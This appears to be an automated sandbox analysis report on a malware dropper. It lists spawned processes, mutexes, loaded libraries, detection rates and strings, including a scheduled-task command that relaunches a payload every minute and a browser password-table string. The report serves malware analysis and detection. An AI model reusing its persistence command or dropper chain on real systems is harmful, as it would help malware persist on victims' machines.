Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe

Code function: 8_2_0085A3E0 CoCreateInstance,

8_2_0085A3E0

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Code function: 0_2_00CF4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,

0_2_00CF4FE0

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JqGBbm7[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4052
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1848
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Mutant created: \Sessions\1\BaseNamedObjects\Pj646RpX9r9iVGlH
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Mutant created: \Sessions\1\BaseNamedObjects\MyUniqueMutexName
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

File created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Command line argument: Kernel32.dll

0_2_00CF2BFB

Source: S2W2ftXM2b.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"

Source: 2X0520.exe, 00000008.00000003.1332365199.0000000005B26000.00000004.00000800.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1347995179.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1332856157.0000000005B07000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2072153029.0000000005F15000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2085682687.0000000005F07000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2072563814.0000000005EF7000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2085464876.0000000005F11000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2318726693.0000000003825000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2330690134.0000000003823000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2319657542.00000000032B6000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2331122340.00000000032C5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: S2W2ftXM2b.exe	Virustotal: Detection: 69%
Source: S2W2ftXM2b.exe	ReversingLabs: Detection: 63%

Source: 1s89v4.exe	String found in binary or memory: " /add
Source: 1s89v4.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add
Source: 2X0520.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: KI2Q1PIQVVVTNGJPW8.exe	String found in binary or memory: " /add /y
Source: KI2Q1PIQVVVTNGJPW8.exe	String found in binary or memory: " /add
Source: KI2Q1PIQVVVTNGJPW8.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add

Source: unknown	Process created: C:\Users\user\Desktop\S2W2ftXM2b.exe "C:\Users\user\Desktop\S2W2ftXM2b.exe"
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\1s89v4.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\2X0520.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Process created: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe "C:\Users\user~1\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe"
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe "C:\Users\user~1\AppData\Local\Temp\10062780101\JqGBbm7.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe "C:\Users\user~1\AppData\Local\Temp\10068150101\3Mv6i65.exe"
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Process created: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe "C:\Users\user~1\AppData\Local\Temp\10068150101\3Mv6i65.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe "C:\Users\user~1\AppData\Local\Temp\10074170101\khykuQw.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe "C:\Users\user~1\AppData\Local\Temp\10075800101\zY9sqWs.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe "C:\Users\user~1\AppData\Local\Temp\10077160101\bPDDW9F.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe "C:\Users\user~1\AppData\Local\Temp\10077440101\d0HNrLB.exe"
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process created: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe "C:\Users\user~1\AppData\Local\Temp\10077440101\d0HNrLB.exe"
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 924
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "d0HNrLB" /tr "C:\Users\user\AppData\Roaming\d0HNrLB.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\d0HNrLB.exe C:\Users\user\AppData\Roaming\d0HNrLB.exe
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process created: C:\Users\user\AppData\Roaming\d0HNrLB.exe "C:\Users\user\AppData\Roaming\d0HNrLB.exe"
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 948
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Process created: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe "C:\Users\user~1\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe "C:\Users\user~1\AppData\Local\Temp\10062780101\JqGBbm7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe "C:\Users\user~1\AppData\Local\Temp\10068150101\3Mv6i65.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe "C:\Users\user~1\AppData\Local\Temp\10074170101\khykuQw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe "C:\Users\user~1\AppData\Local\Temp\10075800101\zY9sqWs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe "C:\Users\user~1\AppData\Local\Temp\10077160101\bPDDW9F.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe "C:\Users\user~1\AppData\Local\Temp\10077440101\d0HNrLB.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Process created: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe "C:\Users\user~1\AppData\Local\Temp\10068150101\3Mv6i65.exe"
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process created: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe "C:\Users\user~1\AppData\Local\Temp\10077440101\d0HNrLB.exe"
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "d0HNrLB" /tr "C:\Users\user\AppData\Roaming\d0HNrLB.exe"
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process created: C:\Users\user\AppData\Roaming\d0HNrLB.exe "C:\Users\user\AppData\Roaming\d0HNrLB.exe"

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Section loaded: advpack.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
